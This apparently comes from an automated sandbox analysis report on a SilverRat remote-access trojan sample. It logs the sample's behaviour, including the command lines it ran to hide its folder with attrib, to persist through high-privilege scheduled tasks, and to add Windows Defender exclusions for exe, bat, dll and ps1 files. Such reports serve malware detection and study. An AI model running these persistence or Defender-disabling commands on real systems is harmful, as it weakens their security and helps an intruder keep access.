                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Yara detected SilverRat
                  Source: Yara matchFile source: YDW0S5K7hi.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.YDW0S5K7hi.exe.4b0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.YDW0S5K7hi.exe.3e30b40.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.YDW0S5K7hi.exe.3e30b40.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000000.1355697494.00000000004B2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1404296493.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: YDW0S5K7hi.exe PID: 7600, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe, type: DROPPED
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeMemory allocated: CF0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeMemory allocated: 1B970000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeMemory allocated: F20000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeMemory allocated: 1B710000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeMemory allocated: CB0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeMemory allocated: 1B180000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3161Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6604Jump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exe TID: 7912Thread sleep count: 204 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exe TID: 7920Thread sleep count: 95 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exe TID: 7624Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6964Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe TID: 6556Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: $77HelpPanel.exe, 0000000A.00000002.2614465492.0000000001033000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllp
                  Source: YDW0S5K7hi.exe, 00000000.00000002.1401926563.0000000000E69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeMemory allocated: page read and write | page guardJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver"Jump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp9C90.tmp.bat""Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 3Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN $77HelpPanel.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /Create /SC ONCE /TN "$77HelpPanel.exe" /TR "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe \"\$77HelpPanel.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHESTJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN $77HelpPanel.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exitJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /sc daily /tn "HelpPanel_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00Jump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeQueries volume information: C:\Users\user\Desktop\YDW0S5K7hi.exe VolumeInformationJump to behavior
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

